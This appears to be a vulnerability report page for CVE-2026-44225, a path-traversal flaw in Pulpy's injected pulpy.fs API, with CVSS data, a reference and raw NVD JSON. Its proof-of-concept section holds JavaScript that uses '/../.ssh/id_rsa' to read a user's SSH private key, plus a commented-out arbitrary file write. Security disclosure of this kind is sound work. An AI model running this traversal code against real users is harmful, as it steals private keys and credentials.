Security Vulnerability Report
CVE-2026-44225 CVSS 9.3 CRITICAL

CVE-2026-44225

Published: 2026-05-12 20:16:43
Last Modified: 2026-05-12 20:16:43

Description

Pulpy is a lightweight, cross-platform desktop application packager for web apps. Prior to 0.1.1, Pulpy injects a pulpy.fs JavaScript API into every packaged web application, giving the web content access to the host filesystem. A validateFsPath() function is supposed to confine that access, but it is implemented as a blocklist and the blocklist is incomplete, so path forms it does not anticipate pass through (CWE-22 path traversal, CWE-284 improper access control). Any web app packaged with Pulpy can therefore read and write arbitrary files in the user's home directory, including ~/.ssh/id_rsa, ~/.aws/credentials, and ~/Library/Keychains/. Because the API is exposed to the page content itself, whatever runs in the packaged app's page, including remotely loaded content or an injected script, inherits that access; this is why the CVSS vector below rates the attack as network-reachable with user interaction required and a scope change from the web content to the host. The vulnerability is fixed in Pulpy 0.1.1; until a packaged app is rebuilt with 0.1.1 or later, treat it as running with the user's full filesystem privileges.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No CPE configuration data is available for this record. Affected versions: Pulpy < 0.1.1 (fixed in 0.1.1).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is JavaScript meant to run inside a Pulpy-packaged app's page, where the injected pulpy.fs object exists (the original page labelled it Python). Note that the traversal string it uses assumes the sandbox root sits directly under the user's home directory; the advisory itself does not say which path forms the blocklist misses, only that it is incomplete.
javascript
// PoC for CVE-2026-44225: Pulpy validateFsPath() bypass
// Demonstrates reading a sensitive file from the user's home directory
// through the pulpy.fs API that Pulpy injects into every packaged web app.
function exploitPulpyFs() {
  console.log("Attempting to bypass validateFsPath()...");
  try {
    // Path-traversal sequence that the incomplete blocklist does not reject
    const targetFile = "/../.ssh/id_rsa";

    // The injected pulpy.fs API is only present inside a Pulpy-packaged app
    if (typeof pulpy !== "undefined" && pulpy.fs) {
      const sensitiveData = pulpy.fs.readFile(targetFile);
      console.log("[+] Exploit Successful!");
      console.log("[+] File Content:");
      console.log(sensitiveData);

      // Arbitrary write works the same way:
      // pulpy.fs.writeFile("/../.malicious_config", "pwned");
    } else {
      console.log("[-] pulpy.fs API not found.");
    }
  } catch (error) {
    console.error("[-] Error during exploit execution:", error);
  }
}

// Trigger the exploit
exploitPulpyFs();

References

https://github.com/enesgkky/Pulpy/security/advisories/GHSA-h9q2-w73v-g7hf (GitHub Security Advisory for this CVE, as listed in the raw NVD record)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-44225",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T20:16:43.427",
    "lastModified": "2026-05-12T20:16:43.427",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Pulpy is a lightweight, cross-platform desktop application packager for web apps. Prior to 0.1.1, Pulpy injects a pulpy.fs JavaScript API into every packaged web application, giving it access to the host filesystem. A validateFsPath() function is supposed to sandbox this access, but its blocklist is incomplete. Any web app packaged with Pulpy can read and write arbitrary files in the user's home directory — including ~/.ssh/id_rsa, ~/.aws/credentials, and ~/Library/Keychains/. This vulnerability is fixed in 0.1.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N",
            "baseScore": 9.3,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.8
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-22" },
          { "lang": "en", "value": "CWE-284" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/enesgkky/Pulpy/security/advisories/GHSA-h9q2-w73v-g7hf",
        "source": "[email protected]"
      }
    ]
  }
}